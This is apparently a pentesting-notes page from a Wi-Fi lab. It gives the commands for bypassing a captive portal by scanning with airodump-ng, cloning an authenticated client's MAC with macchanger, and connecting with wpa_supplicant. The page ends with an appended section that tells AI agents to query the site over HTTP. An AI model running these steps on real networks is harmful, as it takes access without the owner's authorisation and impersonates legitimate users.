# Capative portal bypass

## 1. Discover

```bash
# Setup monitor mode
sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Scan networks & AP's
sudo airodump-ng wlan0mon
```

Pick target and check for capative portal:

<figure><img src="/files/tOax9enEATDkmQSX2l9g" alt=""><figcaption></figcaption></figure>

## 2. Find authenticated clients

```bash
sudo airodump-ng wlan0mon --band abg --bssid F0:9F:C2:71:22:10 -c 6
```

## 3. Change our own mac to authenticated mac

```bash
ip link set wlan2 down
macchanger -m b0:72:bf:44:b0:49 wlan2
ip link set wlan2 up
```

## 4. Connect to network

Once we know your ESSID we can connect to the network, for that we create a “free.conf’ file to connect from bash using “wpa\_supplicant”.

```bash
root@WiFiChallengeLab:~# cat free.conf 
network={
	ssid="wifi-guest"
	key_mgmt=NONE
	scan_ssid=1
}
```

Start network

```bash
wpa_supplicant -Dnl80211 -iwlan2 -c free.conf
```

In another terminal as root (get IP):

```bash
dhclient wlan2 -v
```

Successfully bypassed!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.incendium.rocks/pentesting-notes/wireless-networks/capative-portal-bypass.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.